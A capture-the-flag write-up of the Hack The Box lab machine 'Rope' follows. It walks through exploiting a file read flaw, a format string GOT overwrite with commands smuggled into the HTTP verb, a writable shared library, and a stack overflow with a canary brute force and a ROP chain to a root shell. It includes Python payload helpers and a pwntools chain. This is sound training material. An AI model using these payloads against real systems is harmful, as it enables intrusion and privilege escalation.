Hack The Box :: Rope

Rope is an Insane Linux box created by R4J. It was released on August 3rd, 2019 and retired on May 23rd, 2020. The users rated the box difficulty 7.9/10 and gave it an appreciation score of 4.6/5.

TL;DR

We access a dummy HTML page served by a web server that has an Arbitrary File Read vulnerability, which we use to retrieve the web server binary. It happens to be a modified version of tiny-web-server. With static and dynamic binary analysis, we find and exploit a Format String vulnerability and use it to upload our SSH public key to john's home folder to get SSH access. The very first vulnerability helps us here: it lets us read /proc/self/maps and retrieve the binary and Libc base addresses. john is a sudoer and can run a custom binary, readlogs, as r4j. One of the shared libraries used by the binary is world-writable. We replace it with our own library that spawns a shell as r4j to get the user flag. An internal service runs as root and listens on port 1337. Once again, we grab the binary for analysis and spot a Stack Buffer Overflow (BOF). We bypass the canary, NX and ASLR/PIE to get a shell as root and grab the final flag. This time we can leak a Libc address, but we retrieve the binary base address from /var/log/kern.log.

A user on Discord reported an error in my write-up. What I mentioned as a Local File Inclusion (LFI) is in fact an Arbitrary File Read/Disclosure. The difference being that an LFI includes a file as an executable script. Here we can only read the content of a file. Thanks pql for your review!

Reconnaissance & Enumeration

Open Ports

An NMAP scan shows the following (partial) output:

$ sudo nmap -sS -sV 10.10.10.148

PORT	STATE	SERVICE	VERSION
22/tcp	open	ssh	OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9999/tcp	open	abyss?

We discover:

the usual OpenSSH 7.6p1 on the default port,
a service running on port 9999 that is not recognized but that is a simple web server.

Web discovery

The website shows a login page. However, this is a dummy static HTML page:

A folder/file discovery only shows a basic file structure. A Nikto scan, however, outputs more interesting results:

$ nikto --host http://10.10.10.148:9999
[…]
+ Server banner has changed from '' to 'simple http server' which may suggest a WAF, load balancer or proxy is in place
[…]
+ ///etc/passwd: The server install allows reading of any system file by adding an extra '/' to the URL.
[…]

There is an Arbitrary File Read vulnerability that we can use to read files with the service account access rights:
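The request can also be scripted. The following is only a minimal sketch in Python 3 (standard library only): the helper names are mine, and the raw socket is an assumption made so that no HTTP client gets a chance to normalize the leading `//` of the path.

```python
import socket


def build_file_read_request(path, host="10.10.10.148", port=9999):
    """Build a raw GET request whose target is '/' + an absolute path."""
    if not path.startswith("/"):
        raise ValueError("expected an absolute path such as /etc/passwd")
    target = "/" + path  # the extra leading slash is what Nikto reported
    return (
        f"GET {target} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def read_remote_file(path, host="10.10.10.148", port=9999, timeout=10):
    """Send the request and return the raw response (headers and body)."""
    request = build_file_read_request(path, host, port)
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:  # the server closed the connection
                break
            chunks.append(data)
    return b"".join(chunks)
```

Calling `read_remote_file("/etc/passwd")` would then request `//etc/passwd`, the same URL shape as in the Nikto output.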

By browsing the server’s files, we come across the server binary called httpserver in /opt/www that we can download for analysis:

Let’s grab the OS information as well:

Gaining Access

The binary is 32-bit and not stripped, which may facilitate the analysis:

$ file httpserver
httpserver: ELF 32-bit LSB shared object Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=e4e105bd11d096b41b365fa5c0429788f2dd73c3, not stripped

We will be using both static analysis with Ghidra and dynamic analysis on an Ubuntu 18.04.3 LTS box with pwndbg.

Static Analysis

We load our binary in Ghidra and start with the main function. The main function is quite basic and after some data initialization, it starts a listener and loops infinitely to accept and process user requests:

The process function forks the process then parses the user request. If a file is requested, it is displayed with serve_static and if it is a directory, it is listed with handle_directory_request. Finally, the access is logged on the server-side with log_access:

We won’t go deeper into the analysis because a quick internet search on the function names shows that this is not custom code: it has been borrowed from tiny-web-server [3]. We now have the original source code, which facilitates the analysis even more.

The last version of the code is 7 years old and was not meant to be used in production. Its main use is as a “lightweight file browser” and it was developed with no security checks:

We find as well a POC for a Buffer Overflow. The function url_decode does not check some buffer size before copying the file name:

However, when looking at the decompiled code, we see that this has been patched. The buffer is now 2048 bytes big:

This buffer is then passed as argument to parse_request and then to url_decode. What has been patched in fact is the http_request structure:

Next step, compare the original source code with the Ghidra decompiled code. We see that another change has been made, this time in the log_access function, and it introduced a new vulnerability:

This change introduced a Format String vulnerability. The printf function takes a user-controlled variable (the requested filename) as the only argument. If we request a filename like %x (a format string), as there is no second argument to the function, a value of the stack will be read instead.

It is time to switch to dynamic analysis.

Dynamic Analysis

On our Ubuntu box, the first thing we can check is if the binary has been compiled with hardening options with checksec from pwntools:

There are quite some protections:

Partial RELRO sets the .got section as read-only, however, the section .got.plt (PLT-dependent GOT) stays writable. A good explanation of those binary sections can be found in [6],
The Stack Canary prevents stack buffer overflows by initializing a random value (canary) and pushing it on the stack when we enter a function. Prior to the function return, the canary is checked and if it has been modified (by a buffer overflow), the program aborts,
NX sets the stack as non-executable,
PIE, or Position Independent Executable, lets the binary be loaded at a random base address. Combined with ASLR, the binary and all its dependencies are mapped at random addresses in memory at each restart.

For the rest of this write-up, I will be using GOT to refer to the PLT-dependent GOT.

Let’s run the binary and see how it behaves when we use a format string as filename:

We can see that we can fool the printf function into believing it has multiple parameters, which it then picks from the stack. If we continue reading the stack values, we will start seeing our payload (we add 4 leading As to find it more easily):

We can see our As (0x41414141) followed by our repeated pattern '%x ' (0x207825). Format strings also allow selecting a specific argument. For instance, printf("%3$i", 1, 2, 3) will print the 3rd argument, 3. If we count the stack values, we see that our payload is at offset 53 on the stack. Therefore, we can simply print our As on the stack with %53$x:

How is this useful to us? Well, the beauty of format strings is that we can not only read values on the stack, but we can as well write at any address of the binary as long as the section is writable. How? With the %n specifier.

If we take our previous payload and simply replace the %x with %n, it will write the number of bytes printed so far (our 4 As) at the address 0x41414141. As we control this address value, we can write anywhere. Another feature of format strings is that we can use padding to print a large number of characters at once. For instance, %1000x will print 1000 characters, so AAAA%1000x%53$n will write 0x3ec (1000+4) at 0x41414141.

Now if we want to write a binary address that looks like 0x87654321, we need to print 2'271'560'481 characters, which is quite a lot! We can use yet another format string feature to write this address in 2 steps. We will first write 0x4321 (17185) to the lower 2 bytes of the address with the specifier %hn and then write 0x8765 (34661) to the higher 2 bytes with the same specifier. We can even break this into 4 writes with the specifier %hhn that writes only 1 byte at a time. Such a payload would look like:

AAAACAAA%17177x%53$hn%17476x%54$hn

We first add the 2 addresses where we want to write: 0x41414141 (AAAA) for the lower 2 bytes and 0x41414141+2 = 0x41414143 (CAAA in little-endian) for the higher 2 bytes. Then, as we have already written 8 bytes, we need to adjust the number of characters to print before the write at 0x41414141 (17185 - 8 = 17177) and do the same for the write at 0x41414143 (34661 - 17185 = 17476). Finally, we need to increase the stack offset by one for the second write.
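The arithmetic above is easy to get wrong by hand, so here is a minimal Python 3 sketch of it. The function name is mine, and it assumes a 32-bit little-endian target where the payload starts exactly at the given stack offset. It ignores real-world constraints such as bytes that the HTTP request cannot carry.

```python
import struct


def two_halfword_writes(addr, value, offset):
    """Build a format string that writes the 32-bit `value` at `addr` using two %hn."""
    # The two target addresses open the payload, so printf sees them as
    # arguments number `offset` and `offset + 1`.
    payload = struct.pack("<II", addr, addr + 2)
    written = len(payload)  # characters printed so far (8)
    halves = (value & 0xFFFF, (value >> 16) & 0xFFFF)  # low half first
    for index, half in enumerate(halves):
        # %hn stores the printed-character count modulo 0x10000.
        pad = (half - written) % 0x10000
        if pad < 8:
            # %Nx may print up to 8 hex digits; wrap around instead of
            # risking a width that is too small to be honoured.
            pad += 0x10000
        payload += b"%%%dx%%%d$hn" % (pad, offset + index)
        written += pad
    return payload


print(two_halfword_writes(0x41414141, 0x87654321, 53))
```

For the example values it yields the paddings 17177 and 17476 computed above, with the two addresses packed as AAAA and CAAA.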

You can find some good resources on format string vulnerabilities on the Internet and on YouTube. I recommend watching the LiveOverflow & Gynvael videos [5].

Local Exploitation w/o randomization

Now that we have a fairly good idea of how to exploit this Format String vulnerability, we need to decide what we write and where. As the binary uses Partial RELRO, we could rewrite the GOT entry of a function like puts (which is the next function called after printf) to point to any function of the Libc, like system. Let’s analyze this in a debugger.

Let’s first download the 32-bit version of the Libc used on the server so we work with the right offsets from the start:

$ wget http://10.10.10.148:9999//lib32/libc-2.27.so -O ./libc.so.6

To ease the debugging, we can deactivate the binary randomization first (ASLR + PIE) so our breakpoints will always be at the same address:

$ echo "0" | sudo tee /proc/sys/kernel/randomize_va_space

Then we launch httpserver with the server Libc version, get its PID and attach the debugger to it:

$ LD_PRELOAD=./libc.so.6 ./httpserver &
$ ps -aux | grep httpserver | head -n 1
noob 6028 0.0 0.0 2380 492 pts/1 S+ 21:42 0:00 ./httpserver
$ sudo gdb -p 6028   # do it from another tab

We can now get the GOT entry of puts and the address of system in the Libc used:

All the exploit scripts in this write-up use Python 2.

We can now build an intermediary exploit to see how all this behaves:

Back in pwndbg, let’s set a breakpoint on the vulnerable printf and resume the process:

pwndbg> b *0x565570ec
Breakpoint 1 at 0x565570ec
pwndbg> continue
Continuing

Fire the exploit and verify that the GOT entry of puts has been rewritten with the address of system after the printf call:

Good, it worked! Now, when we detach our debugger, a call to system() is performed server-side…and even more than one:

This is normal as there are 3 calls to puts done with different arguments:

The first call to system() does nothing. The second one executes /bin/sh -c request method: and returns an error. The third one executes /bin/sh -c GET, which is a valid command and shows the command help. By the way, we can see that the http_request structure has been modified to add the HTTP verb.

As we have control over the HTTP verb and there are no checks on it, we can try to execute other commands by calling curl instead of using the requests lib (which converts the custom verb we use to uppercase). For instance, if we call curl with the method id, we get:

Using payloads with spaces does not work but this can be bypassed by replacing spaces with ${IFS}. With a verb cat${IFS}/etc/passwd, we get:
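The substitution itself can be scripted. This is only a sketch in Python 3 with helper names of my own; it builds the raw request line rather than going through curl, and the default host is the box address used throughout.

```python
def command_to_verb(command):
    """Turn a shell command into a space-free token usable as the HTTP verb."""
    # ${IFS} expands to the shell's field separators, so /bin/sh splits the
    # token back into separate words when system() runs it.
    return "${IFS}".join(command.split())


def build_request(command, path="/", host="10.10.10.148:9999"):
    """Raw HTTP request whose method is the encoded command."""
    verb = command_to_verb(command)
    return f"{verb} {path} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()


print(command_to_verb("cat /etc/passwd"))
```

The command must not need literal spaces inside quoted arguments, since every run of whitespace is replaced.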

Remote exploitation w/ randomization

Now that we have code execution without ASLR and PIE, it is time to think about how to get the address of system in the Libc and the GOT entry of puts with randomization on the remote server.

We can get the offset of system in the server’s Libc by querying the symbols:

And for the offset of the puts GOT entry, we can query the relocation table of the binary:

At this point, we are only missing the dynamic base addresses of the binary and of the Libc. It took quite some time to realize, but we can use the server’s feature (or vulnerability?) that we discovered initially, which allows us to read files on the server, to get the information we need.

The /proc/[pid]/maps file contains the mapped memory regions and access permissions of a process. As we do not know the pid of the running binary, we can read /proc/self/maps that resolves to the current process maps file:

Its size is 0, which is normal: files under /proc are virtual and their content is generated by the kernel when they are read (see [7]). The file is nevertheless readable from a shell. However, the web server relies by default on the size reported by fstat() to output the content and therefore shows an empty file.

Back to the original source code. The http_request structure has 2 other members: offset and end. They are used in parse_request() to handle the Range HTTP header. They default both to 0 and end is updated with the size reported by fstat(). However, if the Range header is set, offset and end will be updated accordingly and will take over the value reported by fstat():

Finally, serve_static() outputs the file using sendfile() and uses those 2 values to know how many bytes need to be shown:

We can test this with a curl call:
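An equivalent request can be built in Python 3. This is a minimal sketch with a helper name of my own, and the byte range used in the example (0-4095) is an arbitrary assumption, chosen to be larger than a typical maps file.

```python
def build_range_request(path, start, end, host="10.10.10.148:9999"):
    """Raw GET request with a Range header, for files whose fstat() size is 0."""
    if not path.startswith("/"):
        raise ValueError("expected an absolute path")
    if start < 0 or end < start:
        raise ValueError("invalid byte range")
    return (
        f"GET /{path} HTTP/1.1\r\n"     # '/' + absolute path gives the '//' form
        f"Host: {host}\r\n"
        f"Range: bytes={start}-{end}\r\n"
        "\r\n"
    ).encode()


print(build_range_request("/proc/self/maps", 0, 4095).decode())
```

Because the Range values replace the size reported by fstat(), the server should then send up to that many bytes even though the file claims to be empty.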

We now have all the ingredients for the final payload that will do the following:

read the process self maps to get the binary and Libc base addresses,
compute the address of the GOT entry for puts and of system in the Libc,
use curl to overwrite the puts GOT entry with the address of system to execute our payload.
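The first two steps can be sketched as follows in Python 3. The sample maps content is made up for illustration (it is not the server's real output), the function names are mine, and the two offsets are parameters because their real values come from the symbol and relocation queries above.

```python
# Made-up sample in /proc/[pid]/maps format (not the server's real output).
SAMPLE_MAPS = """\
56555000-56556000 r--p 00000000 08:02 660546 /opt/www/httpserver
56556000-56558000 r-xp 00001000 08:02 660546 /opt/www/httpserver
f7dd0000-f7fa5000 r-xp 00000000 08:02 396100 /lib32/libc-2.27.so
f7fa5000-f7fa6000 ---p 001d5000 08:02 396100 /lib32/libc-2.27.so
ffdd0000-ffdf1000 rw-p 00000000 00:00 0 [stack]
"""


def base_addresses(maps_text, binary_name="httpserver", libc_name="libc-2.27.so"):
    """Return (binary_base, libc_base): the lowest mapping start of each file."""
    bases = {}
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # anonymous mapping, no backing file
        start = int(fields[0].split("-")[0], 16)
        name = fields[5].rsplit("/", 1)[-1]
        if name in (binary_name, libc_name):
            bases[name] = min(start, bases.get(name, start))
    return bases[binary_name], bases[libc_name]


def targets(maps_text, puts_got_offset, system_offset):
    """Absolute addresses of the puts GOT entry and of system()."""
    binary_base, libc_base = base_addresses(maps_text)
    return binary_base + puts_got_offset, libc_base + system_offset


binary_base, libc_base = base_addresses(SAMPLE_MAPS)
print(hex(binary_base), hex(libc_base))
```

Taking the lowest start address per file matters because each file is mapped in several segments, and only the first one starts at the base.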

I tried many different reverse shell payloads and none worked. The best I could get was a connection back but with no output. In the end, what worked was to copy an SSH public key to john's home folder. This is the whole exploit:

We just need to start our HTTP listener to serve the SSH public-key and then launch the exploit:

We now have a shell on the server! But we are not yet halfway through the box!

Local Reconnaissance & Enumeration

The first thing to notice is that the box responds very slowly and it seems on purpose.

Then we see that the user john is a sudoer and can run a binary as the user r4j:

This binary reads the 10 last lines of /var/log/auth.log:

We copy the binary to our box to analyze it with Ghidra. There is only 1 call to printlog() function:

This function is imported from the library liblog.so that we retrieve as well:

Again, the code is pretty simple:

There is nothing to exploit in the binary itself. However, when we look at the library access rights, we see that it is world-writable and that we can actually overwrite it with our own library:

We cannot simply write our own library and load it with LD_PRELOAD as this is not allowed with sudo by default.

By enumerating more, we find as well a local service listening on port 1337:

We can query it with Netcat to send basic messages to the admin:

In the process list, we see it runs with root privileges:

Privilege Escalation

User pivoting

We can spawn a shell as r4j through the readlogs binary by creating a liblog.so library. We can use the following code that spawns a shell:

We compile the library, copy it in place of the existing one and execute readlogs to get the user flag.

Optionally, we can copy our SSH public key to r4j's home folder too.

Glad to see that not everything is insane in this box :)

Root escalation

Let’s retrieve the /opt/support/contact binary for analysis (user r4j has access as he is in the adm group). The binary is 64-bit and symbols are stripped:

$ file /opt/support/contact
/opt/support/contact: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=cc3b330cabc203d0d813e3114f1515b044a1fd4f, stripped

We can as well retrieve the server’s Libc for further usage:

$ ldd /opt/support/contact
linux-vdso.so.1 (0x00007fff27556000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2de1c68000)
/lib64/ld-linux-x86-64.so.2 (0x00007f2de2059000)

We will be using a similar analysis strategy as for httpserver.

Static Analysis

In Ghidra, we see that the code is pretty short and straightforward. There are 4 main functions (I have renamed them for better readability). The main() function sets up the listener and starts accepting client connections then forks:

The forkProcess() function creates a child process to interact with the client. It outputs some text and reads the user input:

The last piece is the readInput() function that…well…reads the user input. And this is where lies a vulnerability:

Up to 1024 bytes are read from the user input and stored in a 56 byte long buffer…which leads to a Stack Buffer Overflow (BOF) ¯_(ツ)_/¯

If you want to understand the theory behind Stack BOF, you can watch the great YouTube video in [8].

Dynamic Analysis

Back to our Ubuntu box. Let’s first check the binary's protections:

We see the same protections as httpserver. However, to exploit a Stack BOF in this situation, we need to bypass first the canary, then NX and PIE.

Let’s test the binary:

As long as we input 56 characters or less, everything goes well and we get the Done. message. But if we send more, we overwrite the canary on the stack and we get the error:

*** stack smashing detected ***

We can attach our debugger to the process (as with httpserver) to have a view on that. However, as there are no symbols, we first need to get the offset of the recv call and add it to the binary base address to set our breakpoint:

$ objdump -d contact | grep '<recv@plt>'
0000000000001030 <recv@plt>:
15c7: e8 64 fa ff ff callq 1030 <recv@plt>

In pwndbg, once attached, we can use vmmap to read the base address:

So we can set a breakpoint at 0x555555554000+0x15c7 = 0x5555555555c7, resume the execution and fire our Python payload. Once the recv call has executed, we look at the stack:

We see that the least significant byte of the canary has been overwritten with our payload a. There are 2 generic ways to bypass a stack canary:

another vulnerability like a format string can leak it, as the canary is on the stack,
we brute-force it byte by byte.

The brute-force works only if the vulnerability is in a forked child process: a crash of the child does not take the parent down, and as the canary is inherited from the parent, it never changes between attempts. This is exactly the case here. Of course, if the parent crashes and is restarted, the canary is reset. Additional information about bypassing canaries can be found in [9].

During the brute-force, to know if we have found the right byte, we simply check if we receive the Done. message, proof that we haven’t crashed the child process.
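The byte-by-byte logic can be sketched in Python 3 as follows. This is not the exploit code of this write-up: the function names are mine, the oracle is abstracted behind a callback, and the socket version assumes the service sends its banner first and answers in a single recv.

```python
import socket


def brute_force_canary(survives, offset=56, canary_len=8):
    """Recover the canary one byte at a time.

    `survives(payload)` must return True when the child answered "Done.".
    """
    canary = b""
    for _ in range(canary_len):
        for guess in range(256):
            candidate = canary + bytes([guess])
            if survives(b"a" * offset + candidate):
                canary = candidate  # this byte is right, move to the next one
                break
        else:
            raise RuntimeError("no byte matched; the oracle is unreliable")
    return canary


def socket_oracle(host="127.0.0.1", port=1337, timeout=5):
    """Oracle talking to the service (protocol details are assumptions)."""
    def survives(payload):
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.recv(1024)  # banner, assumed to be sent first
            sock.sendall(payload)
            try:
                return b"Done." in sock.recv(1024)
            except socket.timeout:
                return False
    return survives


def local_oracle(secret, offset=56):
    """Offline stand-in: a partial overwrite survives only if it matches."""
    def survives(payload):
        overflow = payload[offset:]
        return secret[:len(overflow)] == overflow
    return survives


print(brute_force_canary(local_oracle(bytes.fromhex("00a1b2c3d4e5f607"))).hex())
```

At most 8 x 256 = 2048 requests are needed instead of 2^64 guesses, which is what makes the attack practical against a forking server.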

At this point, the payload will look like this:

[ garbage (56B) | canary (8B) | rest of payload ]

We can continue the analysis to see how the rest of the payload affects the flow. As we have not leaked the canary yet, we can patch it on the fly for the check to pass. Let’s send the payload above like this:

$ python3 -c 'print("a"*56 + "b"*8 + "abcdefghijklmnopqrstuvwxyz", end="")' | nc 127.0.0.1 1337

Once the recv call is done, the canary is checked:

We can patch JE to JNE:

pwndbg> x 0x5555555555da
0x5555555555da: 0x8fe80574 <- 0x74 is JE opcode
pwndbg> set {int}0x5555555555da=0x8fe80575 <- 0x75 is JNE opcode

Once the check is passed, we see that the return address points back into our payload, starting at the 9th byte after the canary:

We have control over the RIP! We can update our payload too:

[ garbage (56B) | canary (8B) | garbage (8B) | rest of payload ]

What will be the second part of the payload? We cannot return-to-shellcode as the stack is non-executable (NX). We could return-to-libc to execute a system('/bin/sh') call but we first need to leak a Libc address as ASLR randomizes its location. Moreover, to interact with a shell in our configuration we need to redirect I/O through the file descriptor used by the binary. Fortunately, the file descriptors are static and given when we launch the binary:

To leak the Libc address, we could use the available write function to leak this address through the GOT. Let’s leak for instance the pointer to send. As write and the GOT both live in the binary, we will also need to know the binary base address to call write.

This will involve using a Return Oriented Programming (ROP) chain twice. Once to leak the Libc address and another one for the return-to-libc:

I won’t go into the theory of Return Oriented Programming here. You can find some resources in [10] if needed.

There are quite some similarities with my previous write-up on Patents. The two ROP chains will be quite similar.

Local Exploitation w/o randomization

Let’s disable again ASLR locally:

$ echo "0" | sudo tee /proc/sys/kernel/randomize_va_space

canary bypass:

Let’s start with the canary brute-force code. It is pretty straight-forward. We add one byte to our first 56 bytes of garbage and try all possible values until we find the byte that returns the Done. message which means that we have found the first byte of the canary. We redo that until we have found the 8 bytes of the canary:

The output will look like:

This code works locally as well as to attack the service on the server and is not ASLR dependent.

libc leak:

Next step is to leak a Libc address by calling write. The call should look like:

write(SOCKFD, got.send, 8)

where SOCKFD is the file descriptor used by the child process (4), got.send is the address of send in the GOT, and 8 is the number of bytes we want to write. As per the x86-64 calling convention [11], the first parameter is passed through the RDI register, the second through RSI and the third through RDX. Therefore, in order to build our ROP chain, we need to find 3 gadgets to pop those values into the right registers. The chain will look like:

pop rdi; ret
SOCKFD
pop rsi; ret
got.send
pop rdx; ret
8
call write

Let’s get all those offsets. To search for the ROP gadgets, we can use ROPgadget:

We have not found a pop rsi; ret gadget, instead, we got a pop rsi; pop r15; ret which means that we need to add a dummy 8 bytes value that will be popped in the r15 register…but it will not be used.
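Put together with the payload layout seen earlier, the chain can be sketched in Python 3 with plain struct packing. The function and dictionary key names are mine, and every offset in the usage example is a placeholder: the real ones come from ROPgadget and from the binary's PLT and GOT.

```python
import struct


def p64(value):
    """Pack an integer as a little-endian 64-bit value."""
    return struct.pack("<Q", value)


def build_leak_payload(canary, base, offsets, sockfd=4, leak_len=8):
    """[56B garbage | canary | 8B filler | ROP chain calling write()]."""
    chain = b"".join(p64(value) for value in (
        base + offsets["pop_rdi"], sockfd,                 # rdi = socket fd
        base + offsets["pop_rsi_r15"],
        base + offsets["got_send"],                        # rsi = &GOT[send]
        0,                                                 # dummy value for r15
        base + offsets["pop_rdx"], leak_len,               # rdx = byte count
        base + offsets["write_plt"],                       # return into write()
    ))
    return b"a" * 56 + canary + b"b" * 8 + chain


# Placeholder offsets for illustration only (not the binary's real ones).
EXAMPLE_OFFSETS = {
    "pop_rdi": 0x1111, "pop_rsi_r15": 0x2222, "pop_rdx": 0x3333,
    "got_send": 0x4444, "write_plt": 0x5555,
}
payload = build_leak_payload(b"\x00" * 8, 0x555555554000, EXAMPLE_OFFSETS)
print(len(payload))
```

The 8 filler bytes after the canary cover the saved base pointer, so the first gadget address lands exactly on the return address.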

We now have all the offsets, but we still do not know the binary base address at this point. With ASLR disabled, it is constant: 0x555555554000. We can hardcode it for the time being. We can add the following code to our exploit:

We can launch the binary with the 64-bit Libc version we downloaded from the server:

$ LD_PRELOAD=./libc.so.6 ./contact

And run our new exploit version. As we already got the canary, we can hardcode it (as long as we haven't restarted the service). The output is:
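Turning the 8 leaked bytes into the Libc base address is a single subtraction. Here is a minimal Python 3 sketch; the function name is mine, and the offset of send used in the example is a placeholder, the real one being read from the server's Libc symbols.

```python
import struct


def libc_base_from_leak(leak, send_offset):
    """Convert the 8 bytes written back by the ROP chain into the Libc base."""
    if len(leak) < 8:
        raise ValueError("expected at least 8 leaked bytes")
    send_addr = struct.unpack("<Q", leak[:8])[0]  # little-endian pointer
    base = send_addr - send_offset
    if base & 0xFFF:
        # A base that is not page-aligned means a wrong offset or a bad leak.
        raise ValueError("computed base is not page-aligned")
    return base


# Placeholder values for illustration only.
example_leak = struct.pack("<Q", 0x7FFFF79E4000 + 0x1234E0)
print(hex(libc_base_from_leak(example_leak, 0x1234E0)))
```

The alignment check is a cheap sanity test: it catches a mismatched Libc version before the second ROP chain is sent.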

system shell:

We will construct this ROP chain differently, by using pwntools magic. The important thing here is to first redirect stdin, stdout and stderr through the child process file descriptor so we can interact with the shell. This can be easily achieved with the dup2 function. This function takes 2 file descriptors as arguments:

int dup2(int oldfd, int newfd);

After the call, newfd refers to the same open file as oldfd (if newfd was already open, it is closed first), and both of them can be used interchangeably.
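This behaviour can be observed locally with Python's os.dup2, which wraps the same system call. The sketch below is only an illustration with a pipe standing in for the socket; the function name is mine.

```python
import os


def dup2_demo(message=b"hello"):
    """Show that data written through newfd reaches the file behind oldfd."""
    read_end, write_end = os.pipe()
    # Open an unrelated file just to obtain a second, distinct descriptor.
    spare = os.open(os.devnull, os.O_WRONLY)
    # oldfd = write_end, newfd = spare: spare stops pointing at the null
    # device and becomes a duplicate of the pipe's write end.
    os.dup2(write_end, spare)
    os.write(spare, message)
    data = os.read(read_end, len(message))
    for fd in (read_end, write_end, spare):
        os.close(fd)
    return data


print(dup2_demo())
```

In the exploit, the same idea is applied three times with newfd set to 0, 1 and 2, so that the shell started by system() reads from and writes to the socket.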

So, we need to call dup2 3 times, then system("/bin/sh"). With pwntools, we construct the ROP chain as follows:

rop = ROP(libc)  
rop.dup2(SOCKFD, 0) # STDIN  
rop.dup2(SOCKFD, 1) # STDOUT  
rop.dup2(SOCKFD, 2) # STDERR  
rop.system(next(libc.search("/bin/sh")))

Then construct our payload and send it as for the Libc leak. This works well and we get a shell locally.

Remote Exploitation w/ randomization

The code is almost ready to work with ASLR enabled to attack the remote server. The only unknown value at this point is the remote binary base address as PIE is enabled.

I was not able (or good enough) to leak it remotely but we still have local access to the box. We cannot read the /proc/$pid/maps file this time as the service runs as root but we remember that the user r4j is part of the adm group. Let’s search for the files he can read:

The kern.log file is interesting as this is where the kernel logs crash information like segmentation faults. Let’s check if we get valuable information from it, but first, we need to make a child process crash once. To do so, we only need to brute-force the canary and send garbage afterward.

We kill our local contact instance and expose the remote service with an SSH port forwarding:

ssh -L 1337:localhost:1337 -i rope_rsa john@10.10.10.148

Then we run our canary brute force script as-is. It still points to localhost:1337 which will be now forwarded to the remote box. This takes around 10 minutes as the server still responds slowly.

Then we can re-use the second Python code a few times with dummy long strings after the canary value to get a segfault:

In the kern.log file we can read:

The addresses in red are addresses of the binary where the segfault happened. Memory mappings are page-aligned, so the binary base address is always a multiple of 0x1000. So we can start from one of the values in red, round it down to a multiple of 0x1000, and keep decreasing the candidate base address by 0x1000 until we get the Libc leak and therefore, a system shell:
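The candidate enumeration can be sketched as follows in Python 3. The function name and the number of pages tried are my own choices, and the address in the example is the local breakpoint address used earlier, not a value from the server's kern.log.

```python
PAGE_SIZE = 0x1000


def candidate_bases(crash_addr, max_pages=16):
    """Yield page-aligned base candidates, walking down from the crash address."""
    top = crash_addr & ~(PAGE_SIZE - 1)  # round down to the page boundary
    for index in range(max_pages):
        candidate = top - index * PAGE_SIZE
        if candidate < 0:
            break
        yield candidate


for base in candidate_bases(0x5555555555C7, max_pages=3):
    print(hex(base))
```

Each candidate is then plugged into the leak chain; the right one is the first for which the service sends back a plausible Libc pointer instead of crashing.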

This is the full exploit code:

Conclusion

What an incredible and challenging box made by R4J!! It is currently in my Top 3 boxes along with Patents (read my write-up) and PlayerTwo (my write-up)!

Some takeaways of this pentest:

use open source tools that are still maintained and that are backed by a strong community,
review regularly world-writable files on your system,
learn about potential weaknesses in C/C++. You can start with the CWE lists in [13].

Resources

[1] Ghidra
https://ghidra-sre.org/

[2] pwndbg
https://github.com/pwndbg/pwndbg

[3] tiny-web-server
https://github.com/shenfeng/tiny-web-server

[4] tiny-web-server buffer overflow
https://surfingthecyber.com/2017/11/10/tiny-web-server-buffer-overflow-discovery-and-poc.html

[5] Format String vulnerability basics
https://www.youtube.com/watch?v=0WvrSfcdq1I
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.youtube.com/watch?v=MBz5C9Wa6KM
https://www.youtube.com/watch?v=xAdjDEwENCQ
http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
https://n00bsec.github.io/update/post/exploitation/reverse-engineering/stringformat/2017/09/28/LearningFormatStringsWithLestrade.html

[6] GOT and PLT for pwning
https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html

[7] Linux process information pseudo-filesystem
http://man7.org/linux/man-pages/man5/proc.5.html
https://www.tldp.org/LDP/Linux-Filesystem-Hierarchy/html/proc.html

[8] Stack Buffer Overflows explained
https://www.youtube.com/watch?v=1S0aBV-Waeo

[9] Stack Canary bypass
https://bananamafia.dev/post/binary-canary-bruteforce/
https://ctf101.org/binary-exploitation/stack-canaries/

[10] ROP videos
https://www.youtube.com/watch?v=XZa0Yu6i_ew
https://www.youtube.com/watch?v=CbW5TYmWQNU
https://www.youtube.com/watch?v=ruJXvxXzyU8

[11] AMD64 Calling Conventions for Linux / Mac OSX
https://courses.cs.washington.edu/courses/cse378/10au/sections/Section1_recap.pdf

[12] ROPgadget
https://github.com/JonathanSalwan/ROPgadget

[13] Weaknesses in Software Written in C & C++
https://cwe.mitre.org/data/definitions/658.html
https://cwe.mitre.org/data/definitions/659.html
